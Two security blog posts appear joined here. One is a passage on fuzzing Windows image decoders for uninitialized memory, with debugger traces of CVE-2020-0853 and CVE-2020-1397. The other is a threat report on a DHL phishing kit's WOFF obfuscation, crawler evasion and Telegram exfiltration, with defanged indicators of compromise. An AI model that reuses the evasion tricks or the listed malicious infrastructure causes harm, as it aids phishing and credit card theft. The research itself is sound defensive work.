    printf("%08x\n", arr[3]);
    return 0;
}

$ clang++ -fsanitize=memory -fno-omit-frame-pointer -g sample.cc

$ ./a.out
==29745==WARNING: MemorySanitizer: use-of-uninitialized-value
#0 0x496db8 (/home/dan/uni/a.out+0x496db8)
#1 0x7f463c5f1bf6 (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#2 0x41ad69 (/home/dan/uni/a.out+0x41ad69)

SUMMARY: MemorySanitizer: use-of-uninitialized-value (/home/dan/uni/a.out+0x496db8)
Exiting

Figure 1: MemorySanitizer detection of uninitialized memory

Similarly, Valgrind can also be used to detect uninitialized memory during run-time.

Detecting Uninitialized Memory in Windows

Compared to Linux, Windows lacks any built-in mechanism for detecting uninitialized memory usage. While Visual Studio and Clang-cl recently introduced AddressSanitizer support, MemorySanitizer and other sanitizers are not implemented as of this writing.

Some of the useful tools in Windows to detect memory corruption vulnerabilities such as PageHeap do not help in detecting uninitialized memory. On the contrary, PageHeap fills the memory allocations with patterns, which essentially makes them initialized.

There are a few third-party tools, including Dr.Memory, that use binary instrumentation to detect memory safety issues such as heap overflows, uninitialized memory usage, use-after-frees, and others.

Detecting Uninitialized Memory in Image Decoding

Detecting uninitialized memory in Windows usually requires binary instrumentation, especially when we do not have access to source code. One of the indicators we can use to detect uninitialized memory usage, specifically in the case of image decoding, is the resulting pixels after the image is decoded.

When an image is decoded, it results in a set of raw pixels. If image decoding uses any uninitialized memory, some or all of the pixels may end up as random. In simpler words, decoding an image multiple times may result in different output each time if uninitialized memory is used. This difference of output can be used to detect uninitialized memory and aid writing a fuzzing harness targeting Windows image decoders. An example fuzzing harness is presented in Figure 2.

#include <stdlib.h>

#define ROUNDS 20

// ComparePixels and CrashProgram are harness helpers that are not shown here.

unsigned char* DecodeImage(char *imagePath)
{
    unsigned char *pixels = NULL;

    // use GDI or WIC to decode image and get the resulting pixels
    ...
    ...

    return pixels;
}

void Fuzz(char *imagePath)
{
    // the first decode serves as the reference output
    unsigned char *refPixels = DecodeImage(imagePath);

    if(refPixels != NULL)
    {
        for(int i = 0; i < ROUNDS; i++)
        {
            unsigned char *currPixels = DecodeImage(imagePath);
            // a decode that fails after the reference decode succeeded is
            // treated as a mismatch as well
            if(currPixels == NULL || !ComparePixels(refPixels, currPixels))
            {
                // the reference pixels and current pixels don't match
                // crash now to let the fuzzer know of this file
                CrashProgram();
            }
            free(currPixels);
        }
        free(refPixels);
    }
}

Figure 2: Diff harness

The idea behind this fuzzing harness is not entirely new; previously, lcamtuf used a similar idea to detect uninitialized memory in open-source image parsers and used a web page to display the pixel differences.
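Figure 2 calls ComparePixels without showing it. The following is a minimal sketch of what such a comparison could look like, assuming the decoder also reports the size of the pixel buffer. The PixelBuffer struct and both function names are hypothetical and are not part of the original harness.

```cpp
#include <cstddef>
#include <cstring>

// Hypothetical view of one decode result. The harness in Figure 2 passes raw
// pointers only, so carrying an explicit size is an assumption of this sketch.
struct PixelBuffer {
    const unsigned char* data;
    std::size_t size;
};

// Returns true when both decodes produced byte-identical pixel data.
bool ComparePixelBuffers(const PixelBuffer& ref, const PixelBuffer& cur) {
    if (ref.data == nullptr || cur.data == nullptr) {
        return ref.data == cur.data;
    }
    if (ref.size != cur.size) {
        return false;
    }
    return std::memcmp(ref.data, cur.data, ref.size) == 0;
}

// Returns the offset of the first differing byte, or the common length if
// no byte differs. Both buffers are assumed to be non-null.
std::size_t FirstMismatch(const PixelBuffer& ref, const PixelBuffer& cur) {
    const std::size_t n = ref.size < cur.size ? ref.size : cur.size;
    for (std::size_t i = 0; i < n; ++i) {
        if (ref.data[i] != cur.data[i]) {
            return i;
        }
    }
    return n;
}
```

Reporting the first mismatching offset is optional for the fuzzer itself, but it gives a starting point when mapping a differing pixel back to the code that produced it.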

Fuzzing

With the diffing harness ready, one can proceed to identify the supported image formats and gather corpora. Gathering image files is easy given their near-unlimited availability on the internet, but finding files with unique code coverage among millions of candidates is harder. Code coverage information for Windows image parsing is tracked from WindowsCodecs.dll.

Note that unlike regular Windows fuzzing, we will not be enabling PageHeap this time as PageHeap “initializes” the heap allocations with patterns.

Results

During my research, I found three cases of uninitialized memory usage while fuzzing Windows built-in image parsers. Two of them are explained in detail in the next sections. Root cause analysis of uninitialized memory usage is non-trivial. We don’t have a crash location to back trace, and have to use the resulting pixel buffer to back trace to find the root cause—or use clever tricks to find the deviation.

CVE-2020-0853

Let’s look at the rendering of the proof of concept (PoC) file before going into the root cause of this vulnerability. For this we will use lcamtuf’s HTML, which loads the PoC image multiple times and compares the pixels with reference pixels.

Figure 3: CVE-2020-0853

As we can see from the resulting images (Figure 3), the output varies drastically in each decoding and we can assume this PoC leaks a lot of uninitialized memory.

To identify the root cause of these vulnerabilities, I used Time Travel Debugging (TTD) extensively. Tracing back the execution and keeping track of memory addresses is a tedious task, but TTD makes it slightly less painful by keeping the addresses and values constant and allowing unlimited forward and backward execution.

After spending quite a bit of time debugging the trace, I found the source of uninitialized memory in windowscodecs!CFormatConverter::Initialize. Even though the source was found, it was not initially clear why this memory ends up in the calculation of pixels without getting overwritten at all. To solve this mystery, additional debugging was done by comparing PoC execution trace against a normal TIFF file decoding. The following section shows the allocation, copying of uninitialized value to pixel calculation and the actual root cause of the vulnerability.

Allocation and Use of Uninitialized Memory

windowscodecs!CFormatConverter::Initialize allocates 0x40 bytes of memory, as shown in Figure 4.

0:000> r
rax=0000000000000000 rbx=0000000000000040 rcx=0000000000000040
rdx=0000000000000008 rsi=000002257a3db448 rdi=0000000000000000
rip=00007ffaf047a238 rsp=000000ad23f6f7c0 rbp=000000ad23f6f841
r8=000000ad23f6f890 r9=0000000000000010 r10=000002257a3db468
r11=000000ad23f6f940 r12=000000000000000e r13=000002257a3db040
r14=000002257a3dbf60 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b             efl=00000246
windowscodecs!CFormatConverter::Initialize+0x1c8:
00007ffa`f047a238 ff15ea081200    call    qword ptr [windowscodecs!_imp_malloc (00007ffa`f059ab28)] ds:00007ffa`f059ab28={msvcrt!malloc (00007ffa`f70e9d30)}
0:000> k
# Child-SP          RetAddr               Call Site
00 000000ad`23f6f7c0 00007ffa`f047c5fb     windowscodecs!CFormatConverter::Initialize+0x1c8
01 000000ad`23f6f890 00007ffa`f047c2f3     windowscodecs!CFormatConverter::Initialize+0x12b
02 000000ad`23f6f980 00007ff6`34ca6dff     windowscodecs!CFormatConverterResolver::Initialize+0x273

//Uninitialized memory after allocation:
0:000> db @rax
00000225`7a3dbf70 d0 b0 3d 7a 25 02 00 00-60 24 3d 7a 25 02 00 00 ..=z%...`$=z%...
00000225`7a3dbf80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00000225`7a3dbf90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00000225`7a3dbfa0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00000225`7a3dbfb0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00000225`7a3dbfc0 00 00 00 00 00 00 00 00-64 51 7c 26 c3 2c 01 03 ........dQ|&.,..
00000225`7a3dbfd0 f0 00 2f 6b 25 02 00 00-f0 00 2f 6b 25 02 00 00 ../k%...../k%...
00000225`7a3dbfe0 60 00 3d 7a 25 02 00 00-60 00 3d 7a 25 02 00 00 `.=z%...`.=z%...

Figure 4: Allocation of memory

The memory never gets written, and the uninitialized values are inverted in windowscodecs!CLibTiffDecoderBase::HrProcessCopy and further processed in windowscodecs!GammaConvert_16bppGrayInt_128bppRGBA and in scaling functions called later.

As there is no read or write into uninitialized memory before HrProcessCopy, I traced the execution back from HrProcessCopy and compared the execution traces with a normal TIFF decoding trace. A difference was found in the way windowscodecs!CLibTiffDecoderBase::UnpackLine behaved with the PoC file compared to a normal TIFF file, and one of the function parameters in UnpackLine was a pointer to the uninitialized buffer.

The UnpackLine function has a series of switch-case statements working with bits per sample (BPS) of TIFF images. In our PoC TIFF file, the BPS value is 0x09—which is not supported by UnpackLine—and the control flow never reaches a code path that writes to the buffer. This is the root cause of the uninitialized memory, which gets processed further down the pipeline and finally shown as pixel data.
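The pattern described above can be illustrated with a small sketch. This is not the real windowscodecs code: UnpackLineSketch, its parameters, and the two supported depths are hypothetical, chosen only to show how an unsupported bits-per-sample value can fall through a switch without the output buffer ever being written.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical stand-in for an unpacking routine; this is NOT the real
// windowscodecs implementation. Returns true only if dst was written.
bool UnpackLineSketch(const std::uint8_t* src, std::uint8_t* dst,
                      std::size_t samples, unsigned bitsPerSample) {
    switch (bitsPerSample) {
    case 8:
        // One byte per sample: copy straight through.
        std::memcpy(dst, src, samples);
        return true;
    case 4:
        // Two samples per byte, high nibble first.
        for (std::size_t i = 0; i < samples; ++i) {
            const std::uint8_t byte = src[i / 2];
            dst[i] = static_cast<std::uint8_t>((i % 2 == 0) ? (byte >> 4)
                                                            : (byte & 0x0F));
        }
        return true;
    default:
        // Unsupported depth such as 9: no branch writes to dst, so the
        // caller's buffer keeps whatever bytes it held before the call.
        return false;
    }
}
```

If the caller ignores the return value and keeps processing dst, stale heap contents flow into the pixel pipeline. Rejecting unsupported depths before any buffer is consumed closes that path.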

Patch

After presenting my analysis to Microsoft, they decided to patch the vulnerability by treating files with unsupported BPS values as invalid. This avoids all decoding and rejects the file at a very early phase of loading.

CVE-2020-1397

Figure 5: Rendering of CVE-2020-1397

Unlike the previous vulnerability, the difference in the output is quite limited in this one, as seen in Figure 5. One of the simpler root cause analysis techniques for a specific type of uninitialized memory usage is comparing the execution traces of runs that produce two different outputs. This technique helps when an uninitialized variable causes a control flow change in the program, which in turn causes a difference in the outputs. For this, a binary instrumentation script was written that logged every executed instruction along with its registers and accessed memory values.

Diffing two distinct execution traces by comparing the instruction pointer (RIP) value, I found a control flow change in windowscodecs!CCCITT::Expand2DLine due to a usage of an uninitialized value. Back tracing the uninitialized value using TTD trace was exceptionally useful for finding the root cause. The following section shows the allocation, population and use of the uninitialized value, which leads to the control flow change and deviance in the pixel outputs.
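The comparison step can be sketched as follows. This is only an illustration of the idea, not the instrumentation script used in the research: it assumes each trace has already been reduced to a list of instruction pointer values that are comparable across runs (for example, recorded as module-relative offsets), and the function name is hypothetical.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Returns the index of the first position at which the two traces disagree,
// or the length of the shorter trace if one is a prefix of the other.
std::size_t FirstDivergence(const std::vector<std::uint64_t>& traceA,
                            const std::vector<std::uint64_t>& traceB) {
    const std::size_t n =
        traceA.size() < traceB.size() ? traceA.size() : traceB.size();
    std::size_t i = 0;
    while (i < n && traceA[i] == traceB[i]) {
        ++i;
    }
    return i;
}
```

The instruction just before the returned index is the last one both runs executed in common, which makes it the natural place to start looking for a branch that depended on an uninitialized value.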

Allocation

windowscodecs!TIFFReadBufferSetup allocates 0x400 bytes of memory, as shown in Figure 6.

windowscodecs!TIFFReadBufferSetup:
...
allocBuff = malloc(size);
*(v3 + 16) |= 0x200u;
*(v3 + 480) = allocBuff;

0:000> k
# Child-SP RetAddr Call Site
00 000000aa`a654f128 00007ff9`4404d4f3 windowscodecs!TIFFReadBufferSetup
01 000000aa`a654f130 00007ff9`4404d3c9 windowscodecs!TIFFFillStrip+0xab
02 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0x91
03 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
04 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
05 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
06 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
07 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
08 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
09 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

After allocation:
0:000> !heap -p -a @rax
address 0000029744382140 found in
_HEAP @ 29735190000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
0000029744382130 0041 0000 [00] 0000029744382140 00400 - (busy)
unknown!noop

//Uninitialized memory after allocation
0:000> db @rax
00000297`44382140 40 7c 5e 97 29 5d 5f ae-73 31 98 70 b8 4f da ac @|^.)]_.s1.p.O..
00000297`44382150 06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83 .QT..*#:O..'..,.
00000297`44382160 3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9 :%....<....'.sA.
00000297`44382170 fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7 .....>.EL...r.!.
00000297`44382180 c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0 .D.;..D..nK.@18.
00000297`44382190 85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66 ....;...x....Maf
00000297`443821a0 16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44 .}..@..EOy...T.D
00000297`443821b0 66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94 f&(...R....4._o.

Figure 6: Allocation of memory

Partially Populating the Buffer

0x10 bytes are copied from the input file to this allocated buffer by TIFFReadRawStrip1. The rest of the buffer remains uninitialized with random values, as shown in Figure 7.

if ( !TIFFReadBufferSetup(v2, a2, stripCount) ) {
return 0i64;
}
if ( TIFFReadRawStrip1(v2, v3, sizeToReadFromFile, "TIFFFillStrip") != sizeToReadFromFile )

0:000> r
rax=0000000000000001 rbx=000002973519a7e0 rcx=000002973519a7e0
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000010
rip=00007ff94404d58c rsp=000000aaa654f128 rbp=0000000000000000
r8=0000000000000010 r9=00007ff94416fc38 r10=0000000000000000
r11=000000aaa654ef60 r12=0000000000000001 r13=0000000000000000
r14=0000029744377de0 r15=0000000000000001
iopl=0         nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b             efl=00000202
windowscodecs!TIFFReadRawStrip1:
00007ff9`4404d58c 488bc4          mov     rax,rsp
0:000> k
# Child-SP          RetAddr           Call Site
00 000000aa`a654f128 00007ff9`4404d491 windowscodecs!TIFFReadRawStrip1
01 000000aa`a654f130 00007ff9`4404d3c9 windowscodecs!TIFFFillStrip+0x49
02 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0x91
03 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
04 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
05 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
06 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
07 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
08 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
09 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

0:000> db 00000297`44382140
00000297`44382140 5b cd 82 55 2a 94 e2 6f-d7 2d a5 93 58 23 00 6c [..U*..o.-..X#.l // 0x10 bytes from file
00000297`44382150 06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83 .QT..*#:O..'..,. // uninitialized memory
00000297`44382160 3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9 :%....<....'.sA.
00000297`44382170 fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7 .....>.EL...r.!.
00000297`44382180 c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0 .D.;..D..nK.@18.
00000297`44382190 85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66 ....;...x....Maf
00000297`443821a0 16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44 .}..@..EOy...T.D
00000297`443821b0 66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94 f&(...R....4._o.

Figure 7: Partial population of memory

Use of Uninitialized Memory

0:000> r
rax=0000000000000006 rbx=0000000000000007 rcx=0000000000000200
rdx=0000000000011803 rsi=0000029744382150 rdi=0000000000000000
rip=00007ff94414e837 rsp=000000aaa654f050 rbp=0000000000000001
r8=0000029744382550 r9=0000000000000000 r10=0000000000000008
r11=0000000000000013 r12=00007ff94418b7b0 r13=0000000000000003
r14=0000000023006c00 r15=00007ff94418bbb0
iopl=0         nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b             efl=00000206
windowscodecs!CCCITT::Expand2DLine+0x253:
00007ff9`4414e837 0fb606          movzx   eax,byte ptr [rsi] ds:00000297`44382150=06             ; Uninitialized memory being accessed

0:000> k
# Child-SP RetAddr Call Site
00 000000aa`a654f050 00007ff9`4414df80 windowscodecs!CCCITT::Expand2DLine+0x253
01 000000aa`a654f0d0 00007ff9`4412afcc windowscodecs!CCCITT::CCITT_Expand+0xac
02 000000aa`a654f120 00007ff9`4404d3f0 windowscodecs!CCITTDecode+0x7c
03 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0xb8
04 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
05 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
06 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
07 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
08 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
09 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
0a 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

Figure 8: Reading of uninitialized value

Depending on the uninitialized value (Figure 8), different code paths are taken in Expand2DLine, which will change the output pixels, as shown in Figure 9.

{
{
if ( v11 != 1 || a2 )
{
unintValue = *++allocBuffer | (unintValue << 8);          // uninit mem read
}
else
{
unintValue <<= 8;
++allocBuffer;
}
--v11;
v16 += 8;
}
v29 = unintValue >> (v16 - 8);
dependentUninitValue = *(l + 2i64 * v29);
v16 -= *(l + 2i64 * v29 + 1);
if ( dependentUninitValue >= 0 )             // path 1
break;
if ( dependentUninitValue < '\xC0' )
return 0xFFFFFFFFi64;                     // path 2
}
if ( dependentUninitValue <= 0x3F )              // path xx
break;

Figure 9: Use of uninitialized memory in if conditions

Patch

Microsoft decided to patch this vulnerability by using calloc instead of malloc, which initializes the allocated memory with zeros.
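The effect of that change can be shown with a short sketch that mirrors the scenario above: a 0x400-byte buffer of which only the first 0x10 bytes are filled from the file. The function name and parameters are hypothetical and the code is not taken from windowscodecs.

```cpp
#include <cstddef>
#include <cstdlib>
#include <cstring>

// Allocates a zero-filled buffer and copies fileBytes bytes of input into
// its start. Returns nullptr on allocation failure or if the input does not
// fit. The caller releases the buffer with std::free.
unsigned char* AllocAndFill(std::size_t bufferSize,
                            const unsigned char* fileData,
                            std::size_t fileBytes) {
    if (fileBytes > bufferSize) {
        return nullptr;
    }
    // calloc zeroes the allocation, unlike malloc.
    auto* buffer = static_cast<unsigned char*>(std::calloc(bufferSize, 1));
    if (buffer == nullptr) {
        return nullptr;
    }
    if (fileBytes > 0) {
        std::memcpy(buffer, fileData, fileBytes);
    }
    return buffer;
}
```

With a zeroed allocation, every byte past the data read from the file has a fixed value, so a decoder that reads beyond the populated region behaves the same way on every run and no longer exposes stale heap contents.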

Conclusion

Part Two of this blog series presents multiple vulnerabilities in Windows’ built-in image parsers. In the next post, we will explore newer supported image formats in Windows such as RAW, HEIF and more.

Phishing Campaign Leverages WOFF Obfuscation and Telegram Channels for Communication

Threat Research

Bernard Sapaden

26 January 2021 at 20:45

FireEye Email Security recently encountered various phishing campaigns, mostly in the Americas and Europe, using source code obfuscation with compromised or bad domains. These domains were masquerading as authentic websites and stole personal information such as credit card data. The stolen information was then shared to cross-platform, cloud-based instant messaging applications.

Coming off a busy holiday season with a massive surge in deliveries, this post highlights a phishing campaign involving a fake DHL tracking page. While phishing attacks targeting users of shipping services are not new, the techniques used in these examples are more complex than what would be found in an off-the-shelf phishing kit.

This campaign uses a WOFF-based substitution cipher, localization-specific targeting, and various evasion techniques, which we unravel in this blog post.

Attack Flow

The attack starts with an email imitating DHL, as seen in Figure 1. The email tries to trick the recipient into clicking on a link, which would take them to a fake DHL website. In Figure 2, we can see the fake page asking for credit card details that, if submitted, would give the user a generic response while in the background the credit card data is shared with the attackers.

Figure 1: DHL phishing attempt

Figure 2: Fake website imitating DHL tracking

This DHL phishing campaign uses a rare technique for obfuscating its source page. The page source contains proper strings, valid tags, and appropriate formatting, but contains encoded text that would render gibberish without decoding prior to loading the page, as seen in Figure 3. Typically, decoding such text is done by including script functions within the code. Yet in this case, the decoding functions are not contained in the script.

Figure 3: Snippet of the encoded text on page source

The decoding is done by a Web Open Font Format (WOFF) font file when the page loads in a browser, so the decoded text is not visible in the page source itself. Figure 4 shows the substitution cipher method and the WOFF font file. The attacker does this to evade detection by security vendors. Many security vendors use static or regex signature-based rules, and this method defeats those naive matching conditions.

Figure 4: WOFF substitution cipher

Loading this custom font which decodes the text is done inside the Cascading Style Sheets (CSS). This technique is rare as JavaScript functions are traditionally used to encrypt and decrypt HTML text.
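To make the mechanism concrete: a font used this way draws the glyph of one letter at the code point of another, so the page source holds one character while the reader sees a different one. The sketch below models that as a plain character substitution. The mapping in the usage note is made up for illustration and is not taken from the analyzed font, and the function name is hypothetical.

```cpp
#include <string>
#include <unordered_map>

// Returns the text a reader would see when each source character is drawn
// with the glyph the custom font assigns to it. Characters without an entry
// in glyphMap are shown unchanged.
std::string RenderAsDisplayed(const std::string& encoded,
                              const std::unordered_map<char, char>& glyphMap) {
    std::string shown;
    shown.reserve(encoded.size());
    for (char c : encoded) {
        auto it = glyphMap.find(c);
        shown.push_back(it != glyphMap.end() ? it->second : c);
    }
    return shown;
}
```

For example, with an invented mapping of x to D, q to H, and z to L, the source text "xqz" would be displayed as "DHL". A scanner that only inspects the raw page source never sees the displayed string.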

Figure 5: CSS file for loading WOFF font file

Figure 5 shows the CSS file used to load the WOFF font file. We have also seen the same CSS file, style.css, being hosted on the following domains:

hxxps://www.lifepointecc[.]com/wp-content/sinin/style.css
hxxps://candyman-shop[.]com/auth/DHL_HOME/style.css
hxxps://mail.rsi-insure[.]com/vendor/ship/dhexpress/style.css
hxxps://www.scriptarticle[.]com/thro/HOME/style.css

These legitimate-looking domains are not hosting any phishing websites as of now; instead, they appear to be a repository for attackers to use in their phishing campaigns. We have seen similar phishing attacks targeting the banking sector in the past, but this is newer for delivery websites.

Notable Techniques

Localization

The phishing page displays the local language based on the region of the targeted user. The localization code (Figure 6) supports major languages spoken in Europe and the Americas such as Spanish, English, and Portuguese.

Figure 6: Localization code

The backend contains PHP resource files for each supported language (Figure 7), which are picked up dynamically based on the user’s IP address location.

Figure 7: Language resource files

Evasion

This campaign employs a variety of techniques to evade detection. The kit does not serve the phishing page if the request comes from certain blocked IP addresses. The backend code (Figure 8) serves users an "HTTP/1.1 403 Forbidden" response header under the following conditions:

IP has been seen five times (AntiBomb_User func)
IP host resolves to its list of avoided host names ('google', 'Altavista', 'Israel', 'M247', 'barracuda', 'niw.com.au' and more) (AntiBomb_WordBoot func)
IP is on its own local blocklist csv (x.csv in the kit) (AntiBomb_Boot func)
IP has been seen POSTing three times (AntiBomb_Block func)

Figure 8: Backend evasion code

After looking at the list of blocked hosts, we could deduce that the attackers were trying to block web crawlers.
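The four conditions listed above can be summarized in a short decision function. This is a sketch of the logic only, written in C++ rather than the kit's PHP; the struct, the function names, the exact thresholds (at least five visits, at least three POSTs), and the case-insensitive substring match are all assumptions made for illustration.

```cpp
#include <algorithm>
#include <cctype>
#include <string>
#include <vector>

// Hypothetical per-visitor state the backend would need to track.
struct VisitorState {
    int timesSeen;          // requests seen from this IP
    int postCount;          // POST submissions seen from this IP
    std::string hostName;   // reverse-resolved host name of the IP
    bool onLocalBlocklist;  // IP appears in the kit's local CSV blocklist
};

static std::string ToLower(std::string s) {
    std::transform(s.begin(), s.end(), s.begin(), [](unsigned char c) {
        return static_cast<char>(std::tolower(c));
    });
    return s;
}

// Returns true when the visitor should receive a 403 instead of the page.
bool ShouldServe403(const VisitorState& v,
                    const std::vector<std::string>& avoidedWords) {
    if (v.timesSeen >= 5 || v.postCount >= 3 || v.onLocalBlocklist) {
        return true;
    }
    const std::string host = ToLower(v.hostName);
    for (const std::string& word : avoidedWords) {
        if (!word.empty() && host.find(ToLower(word)) != std::string::npos) {
            return true;
        }
    }
    return false;
}
```

From a defender's point of view, this is why a page can look clean to a crawler or a repeat scan while still being served to first-time visitors.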

Data Theft

The attackers behind this phishing campaign attempted to steal credentials, credit card data, and other sensitive information. The stolen data is sent to email addresses and Telegram channels controlled by the attacker. We uncovered a Telegram channel where data is being sent using the Telegram Bot API shown in Figure 9.

Figure 9: Chat log

While using the PHP mail() function to send stolen credentials is quite common, encrypted instant messaging applications such as Telegram have recently been used to send phished information back to command and control servers.

We were able to access one of the Telegram channels controlled by the attacker as shown in Figure 10. The sensitive information being sent in the chat includes IP addresses and credit card data.

Figure 10: Telegram channel with stolen information

Conclusion

Attackers (and especially phishers) are always on the hunt for new ways to evade detection by security products. Obfuscation gives the attackers an edge, and makes it harder for security vendors to protect their customers.

By using instant messaging applications, attackers get user data in real time and victims have little time to respond once their personal information is compromised.

Indicators of Compromise (IOC)

FireEye Email Security utilizing FAUDE (FireEye Advanced URL Detection Engine) protects customers from these types of phishing threats. Unlike traditional anti-phishing techniques dependent on static inspection of phishing URL content, FAUDE uses multiple artificial intelligence (AI) and machine learning (ML) engines to more effectively thwart these attacks.

From December 2020 until the time of posting, our FAUDE detection engine saw more than 100 unique URLs hosting DHL phishing pages with obfuscated source code, including:

hxxps://bit[.]ly/2KJ03RH
hxxps://greencannabisstore[.]com/0258/redirect-new.php
hxxps://directcallsolutions[.]co[.]za/CONTACT/DHL_HOME/
hxxps://danapluss[.]com/wp-admin/dhl/home/
hxxp://r.cloudcyberlink[.]digital/<path> (multiple paths using same domain)

Email Addresses

medmox2k@yandex[.]com
o.spammer@yandex[.]com
cameleonanas2@gmail[.]com

Telegram Users

@Saitama330
@cameleon9

style.css

MD5: 83b9653d14c8f7fb95d6ed6a4a3f18eb
SHA-256: d79ec35dc8277aff48adaf9df3ddd5b3e18ac7013e8c374510624ae37cdfba31

font-woff2

MD5: b051d61b693c76f7a6a5f639177fb820
SHA-256: 5dd216ad75ced5dd6acfb48d1ae11ba66fb373c26da7fc5efbdad9fd1c14f6e3

Domains

pradosdemojanda[.]com

global-general-trackks.supercarhiredubai[.]com

tracking-dhi[.]company

tapolarivercamp[.]com

rosariumvigil[.]com

mydhlexpert[.]com

autorepairbyfradel[.]com

URLs

hxxps://wantirnaosteo[.]com[.]au/logon/home/MARKET/F004f19441/11644210b.php

hxxps://ekartenerji[.]com[.]tr/wp-admin/images/dk/DHL/home.php

hxxps://aksharapratishthan[.]org/admin/imagess/F004f19441/sms1.php

hxxps://royalgateedu[.]com/wp-content/plugins/elementor/includes/libraries/infos/package/F004f19441/00951124a.php

hxxps://vandahering[.]com[.]br/htacess

hxxps://hkagc[.]com/man/age/F004f19441/11644210b.php

hxxps://fiquefitnes[s]comsaude[.]com/.well-known/MARKET/MARKET/F004f19441/11644210b.php

hxxps://juneispearlmonth[.]com/-/15454874518741212/dhl-tracking/F004f19441/00951124a.php

hxxps://www.instantcopywritingscript[.]com/blog/wp-content/22/DHL/MARKET

hxxps://isss[.]sjs[.]org[.]hk/wp-admin/includes/F004f19441/11644210b.php

hxxps://www.concordceramic[.]com/fr/frais/F004f19441/11644210b.php

hxxps://infomediaoutlet[.]com/oldsite/wp-content/uploads/2017/02/MARKET/

hxxps://wema-wicie[.]pl/dh/l/en/MARKET

hxxps://www.grupoindustrialsp[.]com/DHL/MARKET/

hxxps://marrecodegoias[.]com[.]br/wp-snapshots/activat/MARKET/F004f19441/11644210b.php

hxxps://villaluna[.]de/wp-content/info/MARKET/F004f19441/11644210b.php

hxxp://sandur[.]dk/wp-content/upgrade/-/MARKET/

hxxps://chistimvse[.]com/es/dhl/MARKET/

hxxps://detmayviet[.]com/wp-includes/widgets/-/MARKET/F004f19441/11644210b.php

hxxps://dartebreakfast[.]com/wp-content/plugins/dhl-espress/MARKET/

hxxps://genesisdistributors[.]com/-/Tracking/dhl/Tracking/dhl-tracking/F004f19441/00951124a.php

hxxps://www.goldstartechs[.]com/wp-admin/js/widgets/102/F004f19441/11644210b.php

hxxps://universalpublicschooltalwandisabo[.]com/DHL

hxxps://intranet[.]prorim[.]org[.]br/info/MARKET/F004f19441/11644210b.php

hxxps://administrativos[.]cl/mail.php

hxxps://nataliadurandpsicologa[.]com[.]br/upgrade/MARKET/F004f19441/11644210b.php

hxxps://tanaxinvest[.]com/en/dhl/MARKET/

hxxps://deepbluedivecenter[.]com/clear/item/

